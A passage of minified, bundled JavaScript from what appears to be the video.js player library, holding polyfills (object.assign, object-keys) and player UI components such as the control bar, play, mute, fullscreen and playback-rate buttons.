c="[object Arguments]",d="[object Object]",e=Array.prototype,f=Error.prototype,g=Object.prototype,h=(h=a.window)?h.document:null,i=g.toString,j=g.propertyIsEnumerable,k=e.splice,l={};!function(a){var b=function(){this.x=a},e={0:a,length:a},g=[];b.prototype={valueOf:a,y:a};for(var m in new b)g.push(m);l.argsTag=i.call(arguments)==c,l.enumErrorProps=j.call(f,"message")||j.call(f,"name"),l.enumPrototypes=j.call(b,"prototype"),l.nodeTag=i.call(h)!=d,l.nonEnumShadows=!/valueOf/.test(g),l.ownLast="x"!=g[0],l.spliceObjects=(k.call(e,0,1),!e[0]),l.unindexedChars="x"[0]+Object("x")[0]!="xx";try{l.dom=11===h.createDocumentFragment().nodeType}catch(n){l.dom=!1}}(1,0),b.exports=l}).call(this,"undefined"!=typeof global?global:"undefined"!=typeof self?self:"undefined"!=typeof window?window:{})},{}],43:[function(a,b){function c(a){return a}b.exports=c},{}],44:[function(a,b){"use strict";var c=a("object-keys"),d=function(a){return"undefined"!=typeof a&&null!==a},e="function"==typeof Symbol&&"symbol"==typeof Symbol(),f=a("define-properties"),g=Object.prototype.propertyIsEnumerable,h=function(a){return function(b){return g.call(a,b)}},i=function(a){if(!d(a))throw new TypeError("target must be an object");var b,f,g,i,j=Object(a);for(b=1;b<arguments.length;++b)for(f=Object(arguments[b]),i=c(f),e&&Object.getOwnPropertySymbols&&i.push.apply(i,Object.getOwnPropertySymbols(f).filter(h(f))),g=0;g<i.length;++g)j[i[g]]=f[i[g]];return j};i.shim=function(){if(Object.assign&&Object.preventExtensions){var a=function(){var a=Object.preventExtensions({1:2});try{Object.assign(a,"xy")}catch(b){return"y"===a[1]}}();a&&delete Object.assign}return Object.assign||f(Object,{assign:i}),Object.assign||i},b.exports=i},{"define-properties":45,"object-keys":47}],45:[function(a,b){"use strict";var c=a("object-keys"),d=a("foreach"),e=Object.prototype.toString,f=function(a){return"function"==typeof a&&"[object Function]"===e.call(a)},g=function(){var a={};try{return Object.defineProperty(a,"x",{value:a}),a.x===a}catch(b){return!1}},h=Object.defineProperty&&g(),i=function(a,b,c,d){(!(b in a)||f(d)&&d())&&(h?Object.defineProperty(a,b,{configurable:!0,enumerable:!1,writable:!0,value:c}):a[b]=c)},j=function(a,b){var e=arguments.length>2?arguments[2]:{};d(c(b),function(c){i(a,c,b[c],e[c])})};j.supportsDescriptors=!!h,b.exports=j},{foreach:46,"object-keys":47}],46:[function(a,b){var c=Object.prototype.hasOwnProperty,d=Object.prototype.toString;b.exports=function(a,b,e){if("[object Function]"!==d.call(b))throw new TypeError("iterator must be a function");var f=a.length;if(f===+f)for(var g=0;f>g;g++)b.call(e,a[g],g,a);else for(var h in a)c.call(a,h)&&b.call(e,a[h],h,a)}},{}],47:[function(a,b){"use strict";var c=Object.prototype.hasOwnProperty,d=Object.prototype.toString,e=a("./isArguments"),f=!{toString:null}.propertyIsEnumerable("toString"),g=function(){}.propertyIsEnumerable("prototype"),h=["toString","toLocaleString","valueOf","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","constructor"],i=function(a){var b=null!==a&&"object"==typeof a,i="[object Function]"===d.call(a),j=e(a),k=b&&"[object String]"===d.call(a),l=[];if(!b&&!i&&!j)throw new TypeError("Object.keys called on a non-object");var m=g&&i;if(k&&a.length>0&&!c.call(a,0))for(var n=0;n<a.length;++n)l.push(String(n));if(j&&a.length>0)for(var o=0;o<a.length;++o)l.push(String(o));else for(var p in a)m&&"prototype"===p||!c.call(a,p)||l.push(String(p));if(f)for(var q=a.constructor,r=q&&q.prototype===a,s=0;s<h.length;++s)r&&"constructor"===h[s]||!c.call(a,h[s])||l.push(h[s]);return 
l};i.shim=function(){return Object.keys||(Object.keys=i),Object.keys||i},b.exports=i},{"./isArguments":48}],48:[function(a,b){"use strict";var c=Object.prototype.toString;b.exports=function(a){var b=c.call(a),d="[object Arguments]"===b;return d||(d="[object Array]"!==b&&null!==a&&"object"==typeof a&&"number"==typeof a.length&&a.length>=0&&"[object Function]"===c.call(a.callee)),d}},{}],49:[function(a,b){function c(a,b){var c,d=null;try{c=JSON.parse(a,b)}catch(e){d=e}return[d,c]}b.exports=c},{}],50:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./button.js"),h=d(g),i=a("./component.js"),j=d(i),k=function(a){function b(c,d){e(this,b),a.call(this,c,d)}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-big-play-button"},b.prototype.handleClick=function(){this.player_.play()},b}(h["default"]);k.prototype.controlText_="Play Video",j["default"].registerComponent("BigPlayButton",k),c["default"]=k,b.exports=c["default"]},{"./button.js":51,"./component.js":52}],51:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./component"),h=d(g),i=a("./utils/dom.js"),j=d(i),k=a("./utils/events.js"),l=d(k),m=a("./utils/fn.js"),n=d(m),o=a("global/document"),p=d(o),q=a("object.assign"),r=d(q),s=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.emitTapEvents(),this.on("tap",this.handleClick),this.on("click",this.handleClick),this.on("focus",this.handleFocus),this.on("blur",this.handleBlur)}return f(b,a),b.prototype.createEl=function(){var b=void 0===arguments[0]?"button":arguments[0],c=void 0===arguments[1]?{}:arguments[1];c=r["default"]({className:this.buildCSSClass(),role:"button","aria-live":"polite",tabIndex:0},c);var d=a.prototype.createEl.call(this,b,c);return this.controlTextEl_=j.createEl("span",{className:"vjs-control-text"}),d.appendChild(this.controlTextEl_),this.controlText(this.controlText_),d},b.prototype.controlText=function(a){return a?(this.controlText_=a,this.controlTextEl_.innerHTML=this.localize(this.controlText_),this):this.controlText_||"Need Text"},b.prototype.buildCSSClass=function(){return"vjs-control vjs-button "+a.prototype.buildCSSClass.call(this)},b.prototype.handleClick=function(){},b.prototype.handleFocus=function(){l.on(p["default"],"keydown",n.bind(this,this.handleKeyPress))},b.prototype.handleKeyPress=function(a){(32===a.which||13===a.which)&&(a.preventDefault(),this.handleClick())},b.prototype.handleBlur=function(){l.off(p["default"],"keydown",n.bind(this,this.handleKeyPress))},b}(h["default"]);h["default"].registerComponent("Button",s),c["default"]=s,b.exports=c["default"]},{"./component":52,"./utils/dom.js":111,"./utils/events.js":112,"./utils/fn.js":113,"global/document":1,"object.assign":44}],52:[function(a,b,c){"use 
strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")};c.__esModule=!0;var f=a("global/window"),g=d(f),h=a("./utils/dom.js"),i=d(h),j=a("./utils/fn.js"),k=d(j),l=a("./utils/guid.js"),m=d(l),n=a("./utils/events.js"),o=d(n),p=a("./utils/log.js"),q=d(p),r=a("./utils/to-title-case.js"),s=d(r),t=a("object.assign"),u=d(t),v=a("./utils/merge-options.js"),w=d(v),x=function(){function a(b,c,d){if(e(this,a),this.player_=!b&&this.play?b=this:b,this.options_=w["default"]({},this.options_),c=this.options_=w["default"](this.options_,c),this.id_=c.id||c.el&&c.el.id,!this.id_){var f=b&&b.id&&b.id()||"no_player";this.id_=""+f+"_component_"+m.newGUID()}this.name_=c.name||null,c.el?this.el_=c.el:c.createEl!==!1&&(this.el_=this.createEl()),this.children_=[],this.childIndex_={},this.childNameIndex_={},c.initChildren!==!1&&this.initChildren(),this.ready(d),c.reportTouchActivity!==!1&&this.enableTouchActivity()}return a.prototype.init=function(){a.apply(this,arguments)},a.prototype.dispose=function(){if(this.trigger({type:"dispose",bubbles:!1}),this.children_)for(var a=this.children_.length-1;a>=0;a--)this.children_[a].dispose&&this.children_[a].dispose();this.children_=null,this.childIndex_=null,this.childNameIndex_=null,this.off(),this.el_.parentNode&&this.el_.parentNode.removeChild(this.el_),i.removeElData(this.el_),this.el_=null},a.prototype.player=function(){return this.player_},a.prototype.options=function(a){return q["default"].warn("this.options() has been deprecated and will be moved to the constructor in 6.0"),a?(this.options_=w["default"](this.options_,a),this.options_):this.options_},a.prototype.el=function(){return this.el_},a.prototype.createEl=function(a,b){return i.createEl(a,b)},a.prototype.localize=function(a){var b=this.player_.language&&this.player_.language(),c=this.player_.languages&&this.player_.languages();if(!b||!c)return a;var d=c[b];if(d&&d[a])return d[a];var e=b.split("-")[0],f=c[e];return f&&f[a]?f[a]:a},a.prototype.contentEl=function(){return this.contentEl_||this.el_},a.prototype.id=function(){return this.id_},a.prototype.name=function(){return this.name_},a.prototype.children=function(){return this.children_},a.prototype.getChildById=function(a){return this.childIndex_[a]},a.prototype.getChild=function(a){return this.childNameIndex_[a]},a.prototype.addChild=function(b){var c=void 0===arguments[1]?{}:arguments[1],d=void 0,e=void 0;if("string"==typeof b){e=b,c||(c={}),c===!0&&(q["default"].warn("Initializing a child component with `true` is deprecated. 
Children should be defined in an array when possible, but if necessary use an object instead of `true`."),c={});var f=c.componentClass||s["default"](e);c.name=e;var g=a.getComponent(f);d=new g(this.player_||this,c)}else d=b;return this.children_.push(d),"function"==typeof d.id&&(this.childIndex_[d.id()]=d),e=e||d.name&&d.name(),e&&(this.childNameIndex_[e]=d),"function"==typeof d.el&&d.el()&&this.contentEl().appendChild(d.el()),d},a.prototype.removeChild=function(a){if("string"==typeof a&&(a=this.getChild(a)),a&&this.children_){for(var b=!1,c=this.children_.length-1;c>=0;c--)if(this.children_[c]===a){b=!0,this.children_.splice(c,1);break}if(b){this.childIndex_[a.id()]=null,this.childNameIndex_[a.name()]=null;var d=a.el();d&&d.parentNode===this.contentEl()&&this.contentEl().removeChild(a.el())}}},a.prototype.initChildren=function(){var a=this,b=this.options_.children;b&&!function(){var c=a.options_,d=function(b,d){void 0!==c[b]&&(d=c[b]),d!==!1&&(d.playerOptions=a.options_.playerOptions,a[b]=a.addChild(b,d))};if(Array.isArray(b))for(var e=0;e<b.length;e++){var f=b[e],g=void 0,h=void 0;"string"==typeof f?(g=f,h={}):(g=f.name,h=f),d(g,h)}else Object.getOwnPropertyNames(b).forEach(function(a){d(a,b[a])})}()},a.prototype.buildCSSClass=function(){return""},a.prototype.on=function(a,b,c){var d=this;return"string"==typeof a||Array.isArray(a)?o.on(this.el_,a,k.bind(this,b)):!function(){var e=a,f=b,g=k.bind(d,c),h=function(){return d.off(e,f,g)};h.guid=g.guid,d.on("dispose",h);var i=function(){return d.off("dispose",h)};i.guid=g.guid,a.nodeName?(o.on(e,f,g),o.on(e,"dispose",i)):"function"==typeof a.on&&(e.on(f,g),e.on("dispose",i))}(),this},a.prototype.off=function(a,b,c){if(!a||"string"==typeof a||Array.isArray(a))o.off(this.el_,a,b);else{var d=a,e=b,f=k.bind(this,c);this.off("dispose",f),a.nodeName?(o.off(d,e,f),o.off(d,"dispose",f)):(d.off(e,f),d.off("dispose",f))}return this},a.prototype.one=function(a,b,c){var d=this,e=arguments;return"string"==typeof a||Array.isArray(a)?o.one(this.el_,a,k.bind(this,b)):!function(){var f=a,g=b,h=k.bind(d,c),i=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){d.off(f,g,i),h.apply(null,e)});i.guid=h.guid,d.on(f,g,i)}(),this},a.prototype.trigger=function(a,b){return o.trigger(this.el_,a,b),this},a.prototype.ready=function(a){return a&&(this.isReady_?this.setTimeout(a,1):(this.readyQueue_=this.readyQueue_||[],this.readyQueue_.push(a))),this},a.prototype.triggerReady=function(){this.isReady_=!0,this.setTimeout(function(){var a=this.readyQueue_;a&&a.length>0&&(a.forEach(function(a){a.call(this)},this),this.readyQueue_=[]),this.trigger("ready")},1)},a.prototype.hasClass=function(a){return i.hasElClass(this.el_,a)},a.prototype.addClass=function(a){return i.addElClass(this.el_,a),this},a.prototype.removeClass=function(a){return i.removeElClass(this.el_,a),this},a.prototype.show=function(){return this.removeClass("vjs-hidden"),this},a.prototype.hide=function(){return this.addClass("vjs-hidden"),this},a.prototype.lockShowing=function(){return this.addClass("vjs-lock-showing"),this},a.prototype.unlockShowing=function(){return this.removeClass("vjs-lock-showing"),this},a.prototype.width=function(a,b){return this.dimension("width",a,b)},a.prototype.height=function(a,b){return this.dimension("height",a,b)},a.prototype.dimensions=function(a,b){return this.width(a,!0).height(b)},a.prototype.dimension=function(a,b,c){if(void 
0!==b)return(null===b||b!==b)&&(b=0),this.el_.style[a]=-1!==(""+b).indexOf("%")||-1!==(""+b).indexOf("px")?b:"auto"===b?"":b+"px",c||this.trigger("resize"),this;if(!this.el_)return 0;var d=this.el_.style[a],e=d.indexOf("px");return-1!==e?parseInt(d.slice(0,e),10):parseInt(this.el_["offset"+s["default"](a)],10)},a.prototype.emitTapEvents=function(){var a=0,b=null,c=10,d=200,e=void 0;this.on("touchstart",function(c){1===c.touches.length&&(b=u["default"]({},c.touches[0]),a=(new Date).getTime(),e=!0)}),this.on("touchmove",function(a){if(a.touches.length>1)e=!1;else if(b){var d=a.touches[0].pageX-b.pageX,f=a.touches[0].pageY-b.pageY,g=Math.sqrt(d*d+f*f);g>c&&(e=!1)}});var f=function(){e=!1};this.on("touchleave",f),this.on("touchcancel",f),this.on("touchend",function(c){if(b=null,e===!0){var f=(new Date).getTime()-a;d>f&&(c.preventDefault(),this.trigger("tap"))}})},a.prototype.enableTouchActivity=function(){if(this.player()&&this.player().reportUserActivity){var a=k.bind(this.player(),this.player().reportUserActivity),b=void 0;this.on("touchstart",function(){a(),this.clearInterval(b),b=this.setInterval(a,250)});var c=function(){a(),this.clearInterval(b)};this.on("touchmove",a),this.on("touchend",c),this.on("touchcancel",c)}},a.prototype.setTimeout=function(a,b){a=k.bind(this,a);var c=g["default"].setTimeout(a,b),d=function(){this.clearTimeout(c)};return d.guid="vjs-timeout-"+c,this.on("dispose",d),c},a.prototype.clearTimeout=function(a){g["default"].clearTimeout(a);var b=function(){};return b.guid="vjs-timeout-"+a,this.off("dispose",b),a},a.prototype.setInterval=function(a,b){a=k.bind(this,a);var c=g["default"].setInterval(a,b),d=function(){this.clearInterval(c)};return d.guid="vjs-interval-"+c,this.on("dispose",d),c},a.prototype.clearInterval=function(a){g["default"].clearInterval(a);var b=function(){};return b.guid="vjs-interval-"+a,this.off("dispose",b),a},a.registerComponent=function(b,c){return a.components_||(a.components_={}),a.components_[b]=c,c},a.getComponent=function(b){return a.components_&&a.components_[b]?a.components_[b]:g["default"]&&g["default"].videojs&&g["default"].videojs[b]?(q["default"].warn("The "+b+" component was added to the videojs object when it should be registered using videojs.registerComponent(name, component)"),g["default"].videojs[b]):void 0},a.extend=function(b){b=b||{},q["default"].warn("Component.extend({}) has been deprecated, use videojs.extends(Component, {}) instead");var c=b.init||b.init||this.prototype.init||this.prototype.init||function(){},d=function(){c.apply(this,arguments)};d.prototype=Object.create(this.prototype),d.prototype.constructor=d,d.extend=a.extend;for(var e in b)b.hasOwnProperty(e)&&(d.prototype[e]=b[e]);return d},a}();x.registerComponent("Component",x),c["default"]=x,b.exports=c["default"]},{"./utils/dom.js":111,"./utils/events.js":112,"./utils/fn.js":113,"./utils/guid.js":115,"./utils/log.js":116,"./utils/merge-options.js":117,"./utils/to-title-case.js":120,"global/window":2,"object.assign":44}],53:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var 
g=a("../component.js"),h=d(g),i=a("./play-toggle.js"),j=(d(i),a("./time-controls/current-time-display.js")),k=(d(j),a("./time-controls/duration-display.js")),l=(d(k),a("./time-controls/time-divider.js")),m=(d(l),a("./time-controls/remaining-time-display.js")),n=(d(m),a("./live-display.js")),o=(d(n),a("./progress-control/progress-control.js")),p=(d(o),a("./fullscreen-toggle.js")),q=(d(p),a("./volume-control/volume-control.js")),r=(d(q),a("./volume-menu-button.js")),s=(d(r),a("./mute-toggle.js")),t=(d(s),a("./text-track-controls/chapters-button.js")),u=(d(t),a("./text-track-controls/subtitles-button.js")),v=(d(u),a("./text-track-controls/captions-button.js")),w=(d(v),a("./playback-rate-menu/playback-rate-menu-button.js")),x=(d(w),a("./spacer-controls/custom-control-spacer.js")),y=(d(x),function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-control-bar"})},b}(h["default"]));y.prototype.options_={loadEvent:"play",children:["playToggle","volumeMenuButton","currentTimeDisplay","timeDivider","durationDisplay","progressControl","liveDisplay","remainingTimeDisplay","customControlSpacer","playbackRateMenuButton","muteToggle","volumeControl","chaptersButton","subtitlesButton","captionsButton","fullscreenToggle"]},h["default"].registerComponent("ControlBar",y),
c["default"]=y,b.exports=c["default"]},{"../component.js":52,"./fullscreen-toggle.js":54,"./live-display.js":55,"./mute-toggle.js":56,"./play-toggle.js":57,"./playback-rate-menu/playback-rate-menu-button.js":58,"./progress-control/progress-control.js":62,"./spacer-controls/custom-control-spacer.js":64,"./text-track-controls/captions-button.js":67,"./text-track-controls/chapters-button.js":68,"./text-track-controls/subtitles-button.js":71,"./time-controls/current-time-display.js":74,"./time-controls/duration-display.js":75,"./time-controls/remaining-time-display.js":76,"./time-controls/time-divider.js":77,"./volume-control/volume-control.js":79,"./volume-menu-button.js":81}],54:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button.js"),h=d(g),i=a("../component.js"),j=d(i),k=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-fullscreen-control "+a.prototype.buildCSSClass.call(this)},b.prototype.handleClick=function(){this.player_.isFullscreen()?(this.player_.exitFullscreen(),this.controlText("Fullscreen")):(this.player_.requestFullscreen(),this.controlText("Non-Fullscreen"))},b}(h["default"]);k.prototype.controlText_="Fullscreen",j["default"].registerComponent("FullscreenToggle",k),c["default"]=k,b.exports=c["default"]},{"../button.js":51,"../component.js":52}],55:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component"),h=d(g),i=a("../utils/dom.js"),j=d(i),k=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this,"div",{className:"vjs-live-control vjs-control"});return this.contentEl_=j.createEl("div",{className:"vjs-live-display",innerHTML:'<span class="vjs-control-text">'+this.localize("Stream Type")+"</span>"+this.localize("LIVE"),"aria-live":"off"}),b.appendChild(this.contentEl_),b},b}(h["default"]);h["default"].registerComponent("LiveDisplay",k),c["default"]=k,b.exports=c["default"]},{"../component":52,"../utils/dom.js":111}],56:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button"),h=d(g),i=a("../component"),j=d(i),k=a("../utils/dom.js"),l=d(k),m=function(a){function 
b(c,d){e(this,b),a.call(this,c,d),this.on(c,"volumechange",this.update),c.tech&&c.tech.featuresVolumeControl===!1&&this.addClass("vjs-hidden"),this.on(c,"loadstart",function(){c.tech.featuresVolumeControl===!1?this.addClass("vjs-hidden"):this.removeClass("vjs-hidden")})}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-mute-control "+a.prototype.buildCSSClass.call(this)},b.prototype.handleClick=function(){this.player_.muted(this.player_.muted()?!1:!0)},b.prototype.update=function(){var a=this.player_.volume(),b=3;0===a||this.player_.muted()?b=0:.33>a?b=1:.67>a&&(b=2);var c=this.player_.muted()?"Unmute":"Mute",d=this.localize(c);this.controlText()!==d&&this.controlText(d);for(var e=0;4>e;e++)l.removeElClass(this.el_,"vjs-vol-"+e);l.addElClass(this.el_,"vjs-vol-"+b)},b}(h["default"]);m.prototype.controlText_="Mute",j["default"].registerComponent("MuteToggle",m),c["default"]=m,b.exports=c["default"]},{"../button":51,"../component":52,"../utils/dom.js":111}],57:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button.js"),h=d(g),i=a("../component.js"),j=d(i),k=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"play",this.handlePlay),this.on(c,"pause",this.handlePause)}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-play-control "+a.prototype.buildCSSClass.call(this)},b.prototype.handleClick=function(){this.player_.paused()?this.player_.play():this.player_.pause()},b.prototype.handlePlay=function(){this.removeClass("vjs-paused"),this.addClass("vjs-playing"),this.controlText("Pause")},b.prototype.handlePause=function(){this.removeClass("vjs-playing"),this.addClass("vjs-paused"),this.controlText("Play")},b}(h["default"]);k.prototype.controlText_="Play",j["default"].registerComponent("PlayToggle",k),c["default"]=k,b.exports=c["default"]},{"../button.js":51,"../component.js":52}],58:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../menu/menu-button.js"),h=d(g),i=a("../../menu/menu.js"),j=d(i),k=a("./playback-rate-menu-item.js"),l=d(k),m=a("../../component.js"),n=d(m),o=a("../../utils/dom.js"),p=d(o),q=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.updateVisibility(),this.updateLabel(),this.on(c,"loadstart",this.updateVisibility),this.on(c,"ratechange",this.updateLabel)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this);return this.labelEl_=p.createEl("div",{className:"vjs-playback-rate-value",innerHTML:1}),b.appendChild(this.labelEl_),b},b.prototype.buildCSSClass=function(){return"vjs-playback-rate "+a.prototype.buildCSSClass.call(this)},b.prototype.createMenu=function(){var a=new j["default"](this.player()),b=this.playbackRates();if(b)for(var 
c=b.length-1;c>=0;c--)a.addChild(new l["default"](this.player(),{rate:b[c]+"x"}));return a},b.prototype.updateARIAAttributes=function(){this.el().setAttribute("aria-valuenow",this.player().playbackRate())},b.prototype.handleClick=function(){for(var a=this.player().playbackRate(),b=this.playbackRates(),c=b[0],d=0;d<b.length;d++)if(b[d]>a){c=b[d];break}this.player().playbackRate(c)},b.prototype.playbackRates=function(){return this.options_.playbackRates||this.options_.playerOptions&&this.options_.playerOptions.playbackRates},b.prototype.playbackRateSupported=function(){return this.player().tech&&this.player().tech.featuresPlaybackRate&&this.playbackRates()&&this.playbackRates().length>0},b.prototype.updateVisibility=function(){this.playbackRateSupported()?this.removeClass("vjs-hidden"):this.addClass("vjs-hidden")},b.prototype.updateLabel=function(){this.playbackRateSupported()&&(this.labelEl_.innerHTML=this.player().playbackRate()+"x")},b}(h["default"]);q.prototype.controlText_="Playback Rate",n["default"].registerComponent("PlaybackRateMenuButton",q),c["default"]=q,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu-button.js":89,"../../menu/menu.js":91,"../../utils/dom.js":111,"./playback-rate-menu-item.js":59}],59:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../menu/menu-item.js"),h=d(g),i=a("../../component.js"),j=d(i),k=function(a){function b(c,d){e(this,b);var f=d.rate,g=parseFloat(f,10);d.label=f,d.selected=1===g,a.call(this,c,d),this.label=f,this.rate=g,this.on(c,"ratechange",this.update)}return f(b,a),b.prototype.handleClick=function(){a.prototype.handleClick.call(this),this.player().playbackRate(this.rate)},b.prototype.update=function(){this.selected(this.player().playbackRate()===this.rate)},b}(h["default"]);k.prototype.contentElType="button",j["default"].registerComponent("PlaybackRateMenuItem",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu-item.js":90}],60:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("../../utils/dom.js"),j=d(i),k=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"progress",this.update)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-load-progress",innerHTML:'<span class="vjs-control-text"><span>'+this.localize("Loaded")+"</span>: 0%</span>"})},b.prototype.update=function(){var a=this.player_.buffered(),b=this.player_.duration(),c=this.player_.bufferedEnd(),d=this.el_.children,e=function(a,b){var c=a/b||0;return 100*(c>=1?1:c)+"%"};this.el_.style.width=e(c,b);for(var f=0;f<a.length;f++){var 
g=a.start(f),h=a.end(f),i=d[f];i||(i=this.el_.appendChild(j.createEl())),i.style.left=e(g,c),i.style.width=e(h-g,c)}for(var f=d.length;f>a.length;f--)this.el_.removeChild(d[f-1])},b}(h["default"]);h["default"].registerComponent("LoadProgressBar",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"../../utils/dom.js":111}],61:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("../../utils/fn.js"),j=d(i),k=a("../../utils/format-time.js"),l=d(k),m=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"timeupdate",this.updateDataAttr),c.ready(j.bind(this,this.updateDataAttr))}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-play-progress",innerHTML:'<span class="vjs-control-text"><span>'+this.localize("Progress")+"</span>: 0%</span>"})},b.prototype.updateDataAttr=function(){var a=this.player_.scrubbing()?this.player_.getCache().currentTime:this.player_.currentTime();this.el_.setAttribute("data-current-time",l["default"](a,this.player_.duration()))},b}(h["default"]);h["default"].registerComponent("PlayProgressBar",m),c["default"]=m,b.exports=c["default"]},{"../../component.js":52,"../../utils/fn.js":113,"../../utils/format-time.js":114}],62:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("./seek-bar.js"),j=(d(i),function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-progress-control vjs-control"})},b}(h["default"]));j.prototype.options_={children:{seekBar:{}}},h["default"].registerComponent("ProgressControl",j),c["default"]=j,b.exports=c["default"]},{"../../component.js":52,"./seek-bar.js":63}],63:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a 